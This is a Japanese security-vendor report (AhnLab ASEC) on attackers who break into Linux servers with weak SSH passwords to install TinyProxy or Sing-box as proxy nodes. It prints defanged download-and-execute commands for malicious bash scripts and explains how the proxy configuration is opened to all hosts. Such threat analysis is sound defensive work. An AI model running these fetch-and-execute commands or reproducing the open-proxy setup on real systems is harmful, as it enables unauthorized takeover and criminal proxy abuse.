AhnLab Security intelligence Center(ASEC)では、ハニーポットを活用して不適切に管理されている Linux サーバーを対象とした攻撃をモニタリングしている。代表的なハニーポットの中には、脆弱な資格情報を使用する SSH サービスがあり、多くの DDoS およびコインマイナーの攻撃者がこれらのシステムを攻撃対象とにしている。
ASEC は、外部から流入される多数の攻撃をモニタリングしている中で、最近、Linux サーバーを攻撃しプロキシをインストールする事例を確認した。各攻撃事例では、TinyProxy や Sing-box をインストールしたが、これらを除いた他の攻撃ログが存在しないことから、攻撃者の目的は感染システムをプロキシノードとして活用するためであると考えられる。
1. TinyProxy インストール事例
攻撃者は、ハニーポット Linux サーバーへのログインを試み、ログインに成功したあと、以下のコマンドで Bash マルウェアをダウンロードし、実行した。
| # (wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh) && chmod +x s.sh && sh s.sh |
図1. ポーランド語のコメントが含まれた不正な Bash スクリプト
Bash スクリプトはまず、OS 環境に応じて apt、yum、dnf を利用し、TinyProxy をインストールする。その後、設定ファイルを操作し外部からの接続が可能になるようにしたあと、持続性を維持する。
図2. TinyProxy 設定および持続性維持ルーチン
具体的に TinyProxy の設定ファイルである「/etc/tinyproxy/tinyproxy.conf」または「/etc/tinyproxy.conf」で Allow および Deny で始まるアクセス制御ルールを削除したあと、「Allow 0.0.0.0/0」ルールを追加する。このルールは外部からの接続を制限なしで可能にするが、それにより攻撃者は TinyProxy がサービスするポートである8888番にアクセスし、感染システムをプロキシとして悪用することができる。
図3. コメント処理および挿入された TinyProxy 設定
2. Sing-box インストール事例
次は、Sing-box という名前のプロキシツールをインストールする攻撃事例である。攻撃者は以下のようなコマンドで Sing-box をインストールした。
| # ls # whoami # sudo su # apt # bash # sudo apt # lscpu # free -h # clear # cat /etc/os-release # sudo apt-get update # sudo -s # head -n 1 /etc/issue # uname -a # which curl # which python3 # ls /usr/bin | grep python # bash <(curl -Ls hxxps://raw.githubusercontent[.]com/eooce/sing-box/main/sing-box.sh) # bash 1 # bah # curl # curl -fsSL hxxps://raw.githubusercontent[.]com/eooce/ssh_tool/main/ssh_tool.sh -o ssh_tool.sh && chmod +x ssh_tool.sh && ./ssh_tool.sh # curl –help # curl -L hxxps://raw.githubusercontent[.]com/eooce/ssh_tool/main/ssh_tool.sh -o ssh_tool.sh # which wget # wget hxxps://raw.githubusercontent[.]com/eooce/ssh_tool/main/ssh_tool.sh -O ssh_tool.sh |
Sing-box は、多目的プロキシをインストールするツールであり、vmess-argo、vless-reality、Hysteria2、TUICv5 プロトコルをサポートする。Github の説明によると、このオープンソースをインストールすることで ChatGPT や Netflix のブロックを解除できる。ちなみに、製作者はこのようなサービスを使用できない国が存在するため、ブロックを回避する目的で Sing-box を製作したものと考えられる。すなわち、海外に位置する仮想プライベートサーバー(VPS)に Sing-box をインストールし、これをプロキシとして利用する場合、Sing-box がサポートする4種類の回避プロトコルを活用してそのサービスを利用できる。しかし、今回の事例では他人のシステムに無断で接続してインストールしており、攻撃者自身が違法に使用するか、金銭的な収益を目的としているものと判断される。
図4. Sing-box Github ページ
3. 結論
近年、 不適切に管理されている Linux サーバーを対象にプロキシをインストールする事例が確認されている。プロキシ機能を担うマルウェアではなく、TinyProxy のような正常なツールや、Sing-box のように正常に使用できるオープンソースツールを悪用する方式が特徴である。攻撃者は、感染システムをプロキシとして活用し、他の攻撃事例から自分を隠ぺいしたり、そのプロキシノードに対するアクセス権限を販売して、犯罪収益を得ることができる。
そのため、管理者はアカウントのパスワードを推測が困難な形式で設定し、定期的にパスワードを変更して総当たり攻撃や辞書攻撃から Linux サーバーを保護する必要がある。また、最新バージョンにパッチを適用して脆弱性攻撃を防ぐ必要がある。
外部に公開されていてアクセスが可能なサーバーに関しては、ファイアウォールのようなセキュリティ製品を利用して攻撃者からのアクセスを統制する必要がある。最後に、V3 を最新バージョンにアップデートしてマルウェアへの感染を事前に遮断できるように注意を払う必要がある。
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム 「AhnLab TIP」 サブスクリプションサービスを通して確認できる。
Categories: マルウェア